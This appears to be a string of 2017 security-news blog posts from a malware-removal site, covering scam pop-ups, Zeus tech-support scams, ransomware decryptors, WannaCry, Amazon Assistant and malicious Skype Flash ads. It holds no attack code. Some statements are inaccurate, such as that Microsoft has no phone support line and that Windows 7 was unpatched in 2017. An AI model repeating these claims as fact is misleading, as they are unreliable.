marketing platform comes to life again ads are looking for new victims

If you have run into the website having a ridiculously long URL domain name starting with, you are likely to see a congratulatory alert. It might come from a supposed Google Rewards Center or most recent one – Facebook Reward Center.

Before you hit the ceiling with joy for supposedly having won an iPhone or another valuable product, let us remind you that it is simply a fake alert. Alternatively, other users may encounter alerts suggesting to update their browsers, Java or Adobe Flash Player.

Advertising intertwines with malvertising

Even though the domain is entitled as Ad Network Performance, it has been one of the oldest spam and adware samples. Originally, such alerts may have simply annoyed you to death, but recent findings suggest that they divert towards a new trend – malvertising.

Due to the popularity of social networks, such as Twitter or Facebook, you might notice the number of supposedly affiliated websites which offer you to reclaim their free giveaways.

A while ago, another spam felony infiltrated Facebook deceiving users with supposedly free flight tickets. It was not only a surprise for netizens but for the very companies which have been mentioned.

Then, users had to fill up a short survey. Then, they would be redirected to an affiliate website which requires entering private information – phone numbers or email address. functions the same. If you disclose any of such details in one of the affiliated websites, get ready for the stream of ads popping up during browsing sessions or cramming your Spam folder.

Another key problem is that this domain is only the tip of the iceberg. There are multiple others:,,,,, etc.

Old tricks along with new strategies

It is surprising that such adware and malvertising techniques are quite old and there have been numerous articles written on this topic, still a high number of users take the bait. It explains why fraudsters have revived marketing technique.
Besides this well-known strategy, keep in mind that crooks come up with new astounding techniques.

Felons have developed a way how to foist malware for users. They do not need to click on a corrupted link or a file – hovering over it is enough. Despite how elaborate spam techniques might emerge, cautiousness remains the ultimate weapon escaping such felony.

The name of Zeus Trojan is widely used by scammers

Tech support scammers send fake alerts about Zeus infection

Zeus Trojan is one of the oldest banking Trojans that started its career in July 2007. Malware has already affected hundreds of thousands of companies, banks, and governmental institutions. Nevertheless, criminals ended their career in 2011; their followers continued spreading new variants of the Trojan.

Meanwhile, scammers, who lack of imagination or creativity, took the name of the trojan in their illegal projects. The name of the banking Trojan is widely used in various technical support scams.

Undoubtedly, the purpose of such scams is to scare people and make them call to fake tech support line where “certified technicians” are willing to help to clean a virus from the computer.

Examples of tech support scams

Getting infecting with Zeus is a terrifying experience. Scammers are aware of human psychology and fear of catching computer infections. Thus, the name of the dangerous banking Trojan should help to commit another cyber crime.

Such scams usually deliver messages in the browser’s window, such as “Windows Defender Alert: Zeus Virus”, “Windows Detected ZEUS Virus” or “You Have A ZEUS Virus.” All these fake alerts state the same – your computer is infected; call the provided number.

However, none of these messages are true. Only antivirus program installed on your PC can inform about malware attack in a program notification window.

All other alerts that appear on the browser are fake, and most probably, created by cyber criminals who are willing to take control over your computer, obtain your personal information or sell a useless software.

Signs of the real Zeus attack

If you ever find yourself on the website that informs about dangerous banking Trojan residing on the system, you should not take any spontaneous actions. Especially, do not grab your phone to call the provided number.

As we have already mentioned, online security alerts are fake. What is more, usually crooks introduce themselves as Microsoft technicians. However, Microsoft does not have a phone support line. Thus, it’s the main sign that you have been scammed.

The real Zeus malware attack is followed by slow computer’s performance, disabled security software, unknown system errors, increased amount of aggressive online ads, and of course, suspicious financial transactions or even empty bank account.

We want to remind that once you suspect that your computer is infected, you should run a full system scan with an updated security tool immediately.

Good news for victims of Jaff ransomware: free decryptor is already available

As Virus Activity blog reports, there’s no need to worry about Jaff ransomware anymore. This recently emerged cyber threat is already decryptable.

This ransomware was noticed spreading via Necrus botnet at the end of spring 2017. Crooks send numerous malicious spam emails that included obfuscated PDF attachment. These files were renamed as copies, scans, invoice and similarly. Apparently, too many users believe that these documents cannot pose harm to their computer.

Unfortunately, these naïve assumptions were wrong. A safely-looking PDF file was actually a DOCM document. This macro-enabled document asked to click “Enable Content” button and clicking it lead to the installation of ransomware.

During its quite short lifetime, malware was updated several times. Different versions of the virus marked encrypted files with .jaff, .wlu and .sVn extensions that made them impossible to open.

However, malware researcher from Kaspersky Labs found the flaw in ransomware’s code. This discovery helped to create a decryption software that can unlock encrypted files for free. Meanwhile, developers of virus offered to use their questionable decryptor for 1.82-2 Bitcoins.

Victims were never encouraged to have business with cyber criminals. However, desperate need for files might have lead thousands of people to pay the ransom. Fortunately, obtaining a decryption key from hackers is no longer an option. Free and secure decryption software can be downloaded from here.

Nevertheless, data recovery seems the most important task after ransomware attack; it’s not quite true. Before taking advantage of the newly created decryptor, you have to make sure that Jaff malware is no longer on your computer.

While crypto-malware resides on the system, all attempts to recover your files might fail. The virus might encrypt decrypted files again. It goes without saying that this malicious program running on your computer also makes the system vulnerable and easily accessible to other cyber threats. Thus, first of all, you have to focus on virus removal.

For ransomware elimination, you will need to use a professional malware removal program and run a full system scan. However, this ransomware is designed to prevent from simple deletion from the system. Thus, you may need to take extra steps before running security software. In this case, Jaff removal instructions on 2-spyware will be handy to you.

May 2017: WannaCry causes the most of the headache

Nearly a month has passed since the first reports about WannaCry ransomware started flooding the Internet. And there were definitely some intense few weeks. Home users, businesses and even major organizations such as hospitals or telecommunication services have been losing large quantities of data and money to this parasite. Some had to suspend or limit their daily operations because of the attacks. For now, the initial wave of WCry attacks seems to have ceased, so we can look back on it in a more of structured manner and highlight the things that have been causing the most headache to the online community.

For a large portion of May after the virus showed up, WCry has been peaking rapidly and infecting thousands of devices a day. Reports about new targeted countries would also emerge daily, causing panic across the world. Over the span of a month, the malware managed to infect over 400,000 machines, making the history as the biggest ransomware attack to this day. The virus would probably have not made it this far if not for the ETERNALBLUE exploit which the hacker group called Shadow Brokers have leaked from the NSA’s secret servers earlier in April. The exploit specifically targeted MS17-010 vulnerability found Windows operating systems. In particular, 98 percent of the affected machines were outdated Windows 7 versions which no longer receive security patches from Microsoft. This security hole is still a major threat for the users who have are using an expired software or have not updated their Windows 10 to the latest version. Undoubtedly, ransomware will thrive as long as the criminals will be able to take advantage of such vulnerabilities.

Despite the fact that security experts managed to come up with a killswitch and decryptor which partially immobilized WannaCry, the virus success has spiked a new wave of interest in ransomware development. Experts say, that spin-off versions such as XData or WannaCry 2.0 are just a beginning and the grim legacy this nasty cyber infection will continue in the future. Thus, it is important to brace ourselves for the potential attacks, protect our devices with professional security software, regularly look for system updated and keep backups.

Things to consider before installing Amazon Assistant is one of those sites where you can find almost everything you need. Undoubtedly, it’s easy to get lost in a variety of products and find the best deal. In order to help users, the company created the Amazon Assistant browser extension. However, if you are one of the online shopping lovers, you should not get excited. Security experts had concerns about this tool and categorized it as a potentially unwanted program (PUP). The main reason why include: the ability to sneak inside the computer unnoticed, tracking data and sharing with third-parties, displaying an excessive amount of online ads and having complicated removal procedure. If you are looking for an honest opinion whether it’s worth installing or not, we can assure that this add-on should not find a place in your browser’s extension list. Former users even call it an Amazon Assistant virus.

Before installing any new program, it’s important to read the Privacy Policy. This document reveals how much information the application collects and how it treats aggregated data. Amazon Assistant doesn’t mind to share details about your to third-parties. Undoubtedly, this information will be used for advertising purposes, and soon you will see lots of ads when browsing the web. Indeed, it’s disturbing and annoying. However, it might be dangerous too. Some of the ads might deliver fake Amazon deals and redirect to the suspicious websites where you can get infected with computer viruses. However, it may not be the only threat. Once you install this tool, you will receive lots of emails and shopping offers. Undoubtedly, they might be useful, but the problem is that cyber criminals send identical emails. The only difference is that they are infected. For several years, cyber criminals have been sending emails informing about order update, shipping problems, and other similar problems. Crooks uses thousands of different emails to spread various versions of so-called Order update virus.

The last problem related to Amazon Assistant is complicated removal procedure. It doesn’t matter whether users installed it directly from the website, or it sneaked with a software bundle. Plenty of people complains that they are unable to get rid of it. Some say that this program does not have “Uninstall” option, and other claims that it is magically reinstalled on the computer again and again. Thus, if we convinced you to get rid of this program or you are dealing with uninstallation problems, you might find these Amazon Assistant removal instructions handy. Well, if you are one of those people who are still considering its installation, bear in mind that you will need to work hard if this extension does not meet your expectations.

North Korean hacker group suspected of being behind the recent WannaCry cyber attack

The infamous ransomware known as WannaCry has infected a quarter of a million computers worldwide, and the total of headlines about it probably makes authors of Locky and Cerber feel disappointed. There is no doubt that the critical ransomware that used EternalBlue exploit to attack computer systems has attracted much media attention. Quick reaction from malware researchers helped to find a kill-switch to inactivate the virus, however, today security experts warn to beware of WannaCry 2.0 that has no kill-switch. However, recently malware analysts have come up with some very suspicious technical details about this virus, raising suspicions that North Korea could be the one to blame for the attack.

The dramatic discovery was made by a Google security researcher Neel Mehta. Researcher claims that some lines of WannaCry’s source code match code of the malicious software called “Contopee” that was used by a North Korean hacker group known as “Lazarus.” The group was accused of hacking Sony Pictures back in 2014 and also stealing six-figure sum from Bangladesh bank in 2016. However, it is only a small observation, which does not prove anything yet. It is a well-known fact that developers of legitimate or malicious programs copy pieces of code of software that is already available. According to security researcher Matt Suiche, “if validated, this means the latest iteration of WannaCry would, in fact, be the first nation state powered ransomware.” At the moment, it is too early to form any conclusions, and apparently, further analysis is required. It is natural that people are looking for culprits of such massive cyber attack, but at the moment, computer users should focus on methods to protect their computers. eSolutions team highly recommends these tips on how to survive the WannaCrypt attack.

Files encrypted by Wallet ransomware might be decrypted

Wallet ransomware virus has been attacking computer users for a while now. Malware has been updated several times and together with its variants encrypted hundreds of thousands of files using a combination of AES and RSA ciphers. Nevertheless, cyber criminals inform that only they can decrypt corrupted data; it’s not true. If you got infected with ransomware, do not listen to lies written in a ransom note. Do not contact cyber criminals via provided email address. The research has shown that this crypto-malware is just another version of Dharma ransomware. It’s not a secret that it is decryptable. Thus, victims of Wallet ransomware can easily restore their files using Rakhini Decryptor created by Kaspersky Lab. However, if your files are marked with .wallet extension, you should not get excited yet. First of all, you need to get rid of this parasite! Only then it’s safe to decrypt files.

Cyber criminals use clever social engineering techniques and spread Wallet payload via malicious spam emails. Such emails might look like sent from banks, financial organizations, well-known companies, online shops, and even governmental institutions. Thus, it’s easy to get tricked into opening an obfuscated email attachment. Once, you make such mistake, you launch the installation and execution of the ransomware. Immediately all your files have [hackers’ email address].wallet or [hackers’ email address].wallet.lock file extensions, and you are asked to contact criminals via one of the dozen email addresses. Instead of that, focus on Wallet removal and clean your computer from this cyber parasite. All the necessary information about virus elimination you can find here. When you complete this unpleasant task, you can download a decryption software from here and get back all your important files for free. As you can see, paying the ransom is not an option!

Small and medium size businesses have become the main targets of ransomware

Recently, security experts reported about a new tendency showing that small and medium size businesses have become the main targets of ransomware authors. The explanation is very simple: scammers are aware of the fact that employees are curious creatures who can hardly resist the temptation to look at the attachment sent to them by an unknown sender. Besides, they know that after using the virus to encrypt the entire network of the company they can make more – owners of small and medium size businesses are much more vulnerable than home users, so they are ready to pay larger sums. However, you should NEVER think about paying a ransom to cyber criminals because you can be left with no money and no files.

Last month was especially active for hackers trying to mislead random companies and infect them with Spora, BTC ransomware, and many others. To make their employees to open an infected attachment and/or extract the attached file, they have set a bunch of spam campaigns using such titles: Office, Support, Sales, Cleints, Credit Control, Customer Support, etc. Beware that such emails are usually filled with real companies, telephone numbers, names and addresses, so you can easily find them on Google. However, these people have no idea that someone has just started using their names and similar information to mislead users and infect them with malware. Before opening the attachment, you should try to contact the sender first. Also, enable the protected view and disable macros on your and colleagues computers to protect yourself from social engineering.

Fake Flash Player ads on Skype push malware to users

According to several users’ complaints that recently appeared on Reddit and Twitter, the official Skype application pushed malicious Adobe Flash Player ads to users. It appears that users received a malicious ad right after logging into their Skype accounts, which suggested installing FlashPlayer.hta file. Now what happens next can shock you. If the user agrees to install it, thinking that a legitimate software like Skype suggests installing required piece of software or update, the malicious JavaScript code inserted into the .hta file runs a PowerShell script, which connects to a website that hosts malware and downloads it from there. Currently known domains that hosted the final payload were oyomakaomojiya(.)org and cievubeataporn(.)net. However, both domains were taken down quickly; therefore malware analysts were not able to reach them and download a sample of the malware from any of them.

Researchers also discovered that both domains were registered using email accounts that were used to set up numerous questionable websites, and IP addresses used to host some of them led to servers that were used to host even more infectious websites. Reportedly, these sites were used for malware distribution and helped to propagate malicious JavaScript files. If you didn’t know this yet, such files could deliver ransomware, Trojans, or other malicious programs right into your computer system.

It goes without saying that the attack against Skype users was carried out by a well-organized cyber crime gang. It seems that this group continuously registers new domains and shuts down the old ones daily, trying to keep malware researchers away from the malware samples they push to victims. Although no more malicious ads were spotted in the next few days, we recommend you to be careful and stay away from any suspicious ads that might appear on Skype. Make sure your anti-malware software is running, and if you want to be aware of tricks scammers use to attack Skype users, read this article about Skype viruses. Recently, a big number of users complained about a suspicious virus that hijacks their accounts and arbitrarily sends out odd hyperlinks to all contacts.

Improving your company’s security

Business can connect people for different challenges. However, when people are working on improving their company’s financial grow and similar indicators, they usually forget about security. It is a shame because nowadays there are various risks related to the entire company, its clients, and employees. What could be done to improve the security level of your organization? Here are the main things to take care of:

  1. Educate your employees about Internet malware and its capabilities. Make sure you let your coworkers know about the latest viruses spreading on the Internet and their distribution techniques. Each of your employees should know the latest techniques used by ransomware, adware, tech support scam viruses and similar malware that can easily put your business to danger.
  2. Ask your colleagues to start using strong passwords and help them understand that business security is different from the personal security. When using your business profiles, they should forget about “12345”, “password” and similar passwords that are not secure.
  3. Let your people know about the danger of outdated software. Almost every business uses such devices as PCs, routers, printers, and internal servers. Make sure that they are kept up-to-date so that they to could perform at their best. It goes without saying that you need to update your anti-virus software daily to prevent infiltration of the latest viruses. If automatic updates are disabled, you should oblige someone to patch updates manually to prevent vulnerabilities in your business devices.
  4. Look for alternatives for the cloud computing. No matter that companies have been widely switching for cloud to store their sensitive data, security experts do not recommend keeping intellectual property there. Think about dangers rising after a cloud service is breached – hackers can easily try to get the access to your company’s sensitive data.